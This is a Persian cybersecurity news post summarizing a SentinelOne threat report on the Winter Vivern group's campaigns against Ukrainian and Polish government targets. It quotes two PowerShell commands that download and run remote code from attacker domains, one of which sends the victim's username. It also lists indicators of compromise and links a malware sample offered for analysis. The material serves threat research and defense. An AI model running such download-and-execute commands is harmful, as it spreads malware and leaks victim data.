Skip to content

ONHEXGROUP

اخبار دنیای امنیت سایبری

  • اخبار
    • آسیب پذیری امنیتی
    • آنالیز بدافزار
    • کنفرانس ،دوره ، وبینار ، لایو ، CTF
    • بازیگران تهدید
    • توسعه اکسپلویت
    • افشای اطلاعات
    • باگ بانتی
    • تیم آبی
    • تیم قرمز
    • امنیت وب
  • دوره های آموزشی
    • دوره رایگان مهندسی معکوس نرم افزار
  • لیست های ویژه
    • موتورهای جستجو برای امنیت سایبری
    • کاتالوگ KEV آژانس CISA
    • آسیب پذیری های وردپرس
      • آسیب پذیری پلاگین ها
      • آسیب پذیری های هسته
      • آسیب پذیری تم ها
    • محصولات خارج از پشتیبانی مایکروسافت
      • محصولات مایکروسافتی که در سال 2022 پشتیبانی نمیشن
      • محصولات مایکروسافتی که در سال 2023 پشتیبانی نمیشن
      • لیست محصولات مایکروسافتی که در سال 2024 پشتیبانی نمیشن
      • لیست محصولات مایکروسافتی که در سال 2025 پشتیبانی نمیشن
    • معرفی فیلم ها و سریالهای مرتبط با هک و امنیت
  • آموزش های ویدیویی
  • انتشارات
    • مجله
    • مقالات
    • پادکست
  • پروژه ها
    • ماشین آسیب پذیر
      • وردپرس آسیب پذیر
  • حمایت مالی ( Donate)
  • تماس با ما
 
  • Home
  • اخبار
  • آنالیز بدافزار
  • اخبار
  • بازیگران تهدید

استفاده از اسکن آنتی ویروس جعلی، برای نصب بدافزار

On اسفند 26, 1401فروردین 28, 1402
seyyid
Share
زمان مطالعه: 3 دقیقه

محققای sentinelone یه گزارشی در خصوص حملات اخیر گروه هکری روسی Winter Vivern منتشر کردن که سازمانهای دولتی اوکراینی و لهستانی رو هدف قرار دادن.

این گروه اولین بار توسط DomainTools در سال 2021 شناسایی شد و اسمش هم بر اساس رشته ای که برای اتصال اولیه با C2 بوده، گرفتن. در ادامه Lab52 در خصوص فعالیت های این گروه گزارشاتی رو منتشر کرد.

این گروه از سال 2021 ، سازمانهای دولتی مختلفی رو در لیتوانی ، هند ، واتیکان و اسلواکی هدف قرار داده. اهداف اخیرشون هم سازمانهای دولتی لهستانی ، وزارت خارجه اوکراین ، وزارت خارجه ایتالیا و افرادی از دولت هند بودن. همچنین یسری شرکت های خصوصی از جمله سازمانهای مخابراتی که از اوکراین حمایت میکنن رو هم هدف قرار دادن. اهداف این گروه همسو با منافع بلاروس و روسیه هستش.

 

 

متدلوژی حمله:

این گروه از اسناد مخرب که اغلب مرتبط با اسناد دولتی معتبر در دسترس عموم یا اسناد با موضوعات خاص و بروز و همچنین  از سایتهایی که مشابه سایتهای دولتی هستن، برای توزیع بدافزار استفاده میکنن. از جمله این موارد اوایل سال 2023 ، این گروه صفحات وب مشابهی برای دفتر مرکزی مبارزه با جرائم سایبری لهستان ، وزارت امور خارجه اوکراین و سرویس امنیتی اوکراین ایجاد کرده بودن. شکل زیر مرتبط با صفحه جعلی برای دامنه cbzc.policja.gov.pl هستش.

 

Winter Vivern target

 

این گروه در سال 2022، با ایجاد سایت فیشینگ، اطلاعات ورود به سامانه email.gov.in مرتبط با دولت هند رو هدف قرار داده بود. همچنین در سال 2022 از طریق فایلهای اکسل آلوده به ماکرو، پروژه I Want to Live رو هدف قرار داده بودن. این پروژه برای کمک به نظامیان روسی که نمیخوان وارد جنگ بشن، ایجاد شده بود.

این گروه توانایی انجام کارهای زیاد با منابع محدود رو داره و در حل مسائلی که براشون پیش میاد انعطاف پذیر و خلاق هستن. در کمپین اخیرشون برای فریب کاربر و شروع آلودگی، از یسری اسکریپت batch بعنوان اسکنر جعلی آنتی ویروس که در حقیقت یه دانلودر بدافزار بودن ، استفاده کردن.

 

Winter Vivern scanner

 

در فایلهای XLS هم پاورشل از طریق ماکرو اجرا شده و در ادامه دستور زیر اجرا میکنه:

 

PowerShell
1
2
powershell.exe -noexit -c "[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};
iex (new-object net.webclient).DownloadString('hxxps://ocs-romastassec[.]com/goog_comredira3cf7ed34f8.php')"

 

در این اسکنرها یه تروجانی بنام APERETIF دانلود و اجرا میشده، که توسط cert اوکراین کشف شده و اسمشم از PDB path برداشتن. بدافزار روی PE32 بوده و در Visual C++ توسعه داده شده و دارای timestamp مه 2021 هستش.

 

1
2
f39b260a9209013d9559173f12fbc2bd5332c52a C:\Users\user_1\source\repos\Aperitivchick\Release\SystemProtector.pdb
a19d46251636fb46a013c7b52361b7340126ab27 C:\Users\user_1\source\repos\Aperitivchick 2\Release\SystemProtector.pdb

 

تروجان قابلیت جمع آوری اطلاعات از قربانی ، پرسیست و اتصال به دامنه marakanas[.]com که تحت کنترل مهاجمین هست رو داره. در اجرای اولیه دستور پاورشلی زیر رو اجرا میکنه :

 

PowerShell
1
2
3
actor-controlled.exe -c "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;
$a=whoami;
iex (New-Object Net.WebClient).DownloadString("""hxxps://marakanas[.]com/Kkdn7862Jj6h2oDASGmpqU4Qq4q4.php?idU=$a""")"

 

مهاجمین در کمپین های توزیع بدافزارشون از سایتهای وردپرسی هک شده استفاده میکنن. از جمله :

 

1
2
hxxps://applesaltbeauty[.]com/wordpress/wp-includes/widgets/classwp/521734i
hxxps://natply[.]com/wordpress/wp-includes/fonts/ch/097214o

 

این بازیگران تهدید ، علاوه بر موارد بالا ، از برنامه های قانونی ویندوز هم در حملاتشون استفاده میکنن. همچنین از آسیب پذیری های موجود در برنامه ها هم برای نفوذ اولیه استفاده میکنن. محققا یه نمونه از سرورهای تحت کنترل این گروه رو پیدا کردن که روش Acunetix بوده و احتمالا برای اسکن آسیب پذیری رو اهداف ازش استفاده میکردن.

 

Winter Vivern Acunetix

 

دانلود نمونه بدافزار:

نمونه تروجان مرتبط با گزارش رو میتونید برای تحلیل و تمرین بیشتر از اینجا دانلود کنید

 

IoCهای گزارش:

Type Indicator
Domain bugiplaysec[.]com
Domain marakanas[.]com
Domain mfa_it_sec@outlook[.]com
Domain ocs-romastassec[.]com
Domain ocspdep[.]com
Domain security-ocsp[.]com
Domain troadsecow[.]com
URL hxxps://applesaltbeauty[.]com/wordpress/wp-includes/widgets/classwp/521734i
URL hxxps://marakanas[.]com/Kkdn7862Jj6h2oDASGmpqU4Qq4q4.php
URL hxxps://natply[.]com/wordpress/wp-includes/fonts/ch/097214o
URL hxxps://ocs-romastassec[.]com/goog_comredira3cf7ed34f8.php
IP 176.97.66[.]57
IP 179.43.187[.]175
IP 179.43.187[.]207
IP 195.54.170[.]26
IP 80.79.124[.]135
File SHA1 0fe3fe479885dc4d9322b06667054f233f343e20
File SHA1 83f00ee38950436527499769db5c7ecb74a9ea41
File SHA1 a19d46251636fb46a013c7b52361b7340126ab27
File SHA1 a574c5d692b86c6c3ee710af69fccbb908fe1bb8
File SHA1 c7fa6727fe029c3eaa6d9d8bd860291d7e6e3dd0
File SHA1 f39b260a9209013d9559173f12fbc2bd5332c52a

 

 

منبع

 

 

اشتراک در شبکه های اجتماعی :

Facebook
Twitter
Pinterest
LinkedIn
In آنالیز بدافزار اخبار بازیگران تهدیدIn sentinelone , Winter Vivern

راهبری نوشته

فروش داده های آژانس USMS آمریکا
کشف 18 آسیب پذیری زیرودی در چیپستهای Exynos سامسونگ

دیدگاهتان را بنویسید لغو پاسخ

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

دسته‌ها

  • Osint
  • آسیب پذیری امنیتی
  • آموزش های ویدیویی
  • آنالیز بدافزار
  • اخبار
  • افشای اطلاعات
  • امنیت وب
  • انتشارات
  • اینترنت اشیاء
  • بازیگران تهدید
  • باگ بانتی
  • پادکست
  • پروژه ها
  • توسعه اکسپلویت
  • تیم آبی
  • تیم قرمز
  • دوره های آموزشی
  • فازینگ
  • کنفرانس ،دوره ، وبینار ، لایو ، CTF
  • لیست های ویژه
  • ماشین آسیب پذیر
  • مجله
  • مقالات
  • مهندسی معکوس نرم افزار

پست های مرتبط

  • اخبار
  • کنفرانس ،دوره ، وبینار ، لایو ، CTF
seyyid
On دی 2, 1401دی 19, 1401

ویدیوهای کنفرانس بلک هت 2022

  • آسیب پذیری امنیتی
  • اخبار
  • بازیگران تهدید
  • توسعه اکسپلویت
  • مقالات
seyyid
On دی 2, 1401دی 19, 1401

هشدار FORTINET در خصوص وجود 16 آسیب پذیری در محصولات مختلفش

  • اخبار
  • کنفرانس ،دوره ، وبینار ، لایو ، CTF
seyyid
On اردیبهشت 13, 1402اردیبهشت 14, 1402

ویدیوهای BlueHat IL 2023

  • آسیب پذیری امنیتی
  • اخبار
  • امنیت وب
  • انتشارات
  • باگ بانتی
  • پروژه ها
  • توسعه اکسپلویت
  • ماشین آسیب پذیر
  • مقالات
seyyid
On اردیبهشت 27, 1403خرداد 21, 1403

نسخه وردپرس آسیب پذیر برای آوریل 2024 منتشر شد

درباره ما

بعد از چندین سال فعالیت تو حوزه امنیت سایبری و تولید محتوا در شبکه های اجتماعی ، بالاخره تصمیم گرفتیم تا یه سایت راه اندازی کنیم و مطالب رو ساده تر ، در یک محیط منسجم و طبقه بندی شده به دست مخاطب برسونیم. امیدوارم که قدمی در راستای رشد امنیت سایبری کشورمون برداشته باشیم.

تگ ها

0day APT command injection Deserialization of Untrusted Data Directory Traversal FBI Fortinet Heap buffer overflow integer overflow kali LockBit Memory Corruption nuclei Off By One Security out-of-bounds write Out of bounds read Patch Tuesday PWN2OWN Stack Buffer overflow type confusion use after free vulnerable wordpress XSS ZDI vulnerability آموزش اکسپلویت نویسی ارز دیجیتال اندروید اپل اکسپلویت باج افزار تلگرام زیرودی سیسکو فارنزیک فورتی نت فیشینگ لاک بیت مایکروسافت هوش مصنوعی وردپرس وردپرس آسیب پذیر ویندوز پلاگین کروم گوگل

شبکه های اجتماعی

    • Instagram
    • Telegram
    • Twitter
    • GitHub
    • YouTube
    • LinkedIn
      کپی مطالب با ذکر منبع بلامانع است | 1401-1404